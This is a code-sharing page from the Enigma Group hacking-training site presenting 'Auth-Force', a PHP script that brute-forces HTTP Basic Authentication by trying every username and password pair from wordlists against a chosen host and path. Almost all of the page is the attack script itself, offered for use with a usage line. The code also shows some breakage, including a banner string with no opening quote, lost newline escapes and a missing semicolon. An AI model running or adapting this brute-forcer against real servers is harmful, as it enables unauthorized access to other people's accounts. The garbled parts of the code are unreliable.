EG Information

Main Index
EG Manual
Disclaimer
Legal Information
Hall of Fame
Hall of Shame
Member Rankings
Members List
Meet the Staff

Training Missions

Read Me First New
Basic Skills
Realistic Scenarios
Cryptography
Software Cracking
Linux ELF Binary Cracking
Logical Thinking
Programming
Patching
Steganography
Deface This Wall
/dev/null
/dev/urandom

Knowledge Bank

Discussion Forums
Enigma Chat New
RSS Feeds RSS
Articles / Tutorials
Videos
Online EG MP3 Player Radio
Enigma Zine
Downloads
Tools New

Code Resources

Submit Code
Ajax
ASM
Bash
C
CPP
Csharp
Delphi
Haskell
Java
Javascript
Jython
Lisp
mIRC
MySQL
Perl
PHP
Python
QBASIC
VisualBasic

Hakipedia: An open collaborative for all your information security needs.

The Urinal

Click Here To Vote For EG!

Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site.

enigma group

enigma group

enigma group

enigma group

Enigma Group's Code Bank


[PHP] Auth-Force

By: blink_212  -  Date Submitted: 2009-07-27 11:07:48

  1. <?php
  2.  
  3.  
  4. $userlist = @$argv[1];
  5. $passlist = @$argv[2];
  6. $host = @$argv[3];
  7. $path = @$argv[4];
  8. $port = @$argv[5];
  9.  
  10.  
  12. ------------------------------------------------------------------------
  13.     :::     :::    ::: ::::::::::: :::    ::: 
  14.   :+: :+:   :+:    :+:     :+:     :+:    :+: 
  15.  +:+   +:+  +:+    +:+     +:+     +:+    +:+ 
  16. +#++:++#++: +#+    +:+     +#+     +#++:++#++ 
  17. +#+     +#+ +#+    +#+     +#+     +#+    +#+ 
  18. #+#     #+# #+#    #+#     #+#     #+#    #+# 
  19. ###     ###  ########      ###     ###    ###
  20. :::::::::: ::::::::  :::::::::   ::::::::  :::::::::: 
  21. :+:       :+:    :+: :+:    :+: :+:    :+: :+:        
  22. +:+       +:+    +:+ +:+    +:+ +:+        +:+        
  23. :#::+::#  +#+    +:+ +#++:++#:  +#+        +#++:++#   
  24. +#+       +#+    +#+ +#+    +#+ +#+        +#+        
  25. #+#       #+#    #+# #+#    #+# #+#    #+# #+#        
  26. ###        ########  ###    ###  ########  ########## 
  27.  
  28. 	HTTP Basic Authentication Wordlist Attacker
  29.  
  30. DarkCode.me - DUSecurity.com - EngimaGroup.org
  31. Coded By zeN/Blink
  32. Usage : php auth-force.php <userlist> <passlist> <host> <path> <port>
  33.  
  34. ------------------------------------------------------------------------
  35. ";
  36.  
  37. if(!$userlist || !$passlist || !$host || !$path || !$port) { die("[-] Incorrect Arguments, Exiting...n"); }
  38.  
  39. echo $userlist;
  40.  
  41. 	$user = file($userlist);
  42.     $pass = file($passlist);
  43.  
  44. echo "[+] Starting Cracker...n";
  45.  
  46. foreach($user as $username) {
  47.  
  48. 	$username = substr_replace($username ,"",-2);
  49.  
  50. 	foreach($pass as $password) {
  51.  
  52. 		$password = substr_replace($password ,"",-2);
  53. 		$data = CheckLogin($host, $path, $username, $password);
  54. 		$resu = CheckResult($data);
  55.  
  56. 		if($resu == true) {
  57. 			echo "n[+] $username : $passwordn";
  58. 				die  ("[+] We have a login captain!n");
  59. 		} else {
  60. 			echo "[-] $username : $password - Incorrect!n";
  61. 		}
  62. 	} 	// End of the $password loop.
  63. } 		// End of the $username loop.
  64.  
  65. function CheckLogin($host, $path, $user, $pass) {
  66.  
  67. 	$curl = curl_init();
  68.  
  69. 		curl_setopt($curl,CURLOPT_URL,$host.$path);
  70. 		curl_setopt($curl, CURLOPT_USERPWD,"$user:$pass");
  71. 		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  72. 			$data = curl_exec($curl);
  73. 				curl_close($curl);
  74.  
  75. 		return $data;
  76. }
  77.  
  78. function CheckResult($data)
  79. {
  80. 	if(strstr($data,"301 Moved Permanently")) 		{ return false; }
  81. 	else if(strstr($data,"401 Authorization Required"))	{ return false; }
  82. 	else if(strstr($data,"404 Not Found"))				{ die("n[-] We received a 404. Please check your settings!") }
  83.  
  84. 	else { return true; }
  85. }
  86.  
  87. ?>
  88.  
Comments [11]
Return to php category list

Who's Online

487 Guests, 99 Users
ckryptix, Diznablo, Nicid1, Ios, viper0i0, rabbidmind, Nasrudin, CollapsingWalls, mehtaparag, bitstrike, jnony, C, Nusquam-Redono-Sapientia, bazcrown, saifulfaizan, The End, Ultraminor, psychomarine, st3alth, themastersinner, pgmrlink, login, lionaneesh, ishkur88, mahraja, Mac, chekifr, gandalf88, Vap0r, t0ast, tantrum6226, BnE, Distorted, Psiber_Syn, Ausome1, invas10n, oldgoat, freedaysbecumei, BinaryShinigami, Rex_Mundi, Red_beard, Strobeflux, s0m3nak3dguy, Descent, teehee, machupicchu, Genetix, Anandarl, NotMyOwn, thegamerdude, Godzila, popo12341234, RedEvolution, velocity_b, myne17, teto111, aVoid, Central-Gsm, 1101, JackalReborn, InjectioN, h4lted, c0re, DisPater, markt4death, splatta, Jackowacko, saint556, Pyron2312, Azerion, howsens, white.hat.gone.bad, vazzilly, pwunkz, Inverted, QuarterCask, Infernoe11, deskata, cr4ck3rj4ck, Blizer, jasonmax, j0sh, gwenwavor, N4g4c3N, spizeyboy, Network X, Uino59, Jae Cee, ianFDK, saykov, medhaavee, zofy, demonkiller410, Stumble, SaMTHG, kishore, Raze, helasraizam, Venom1019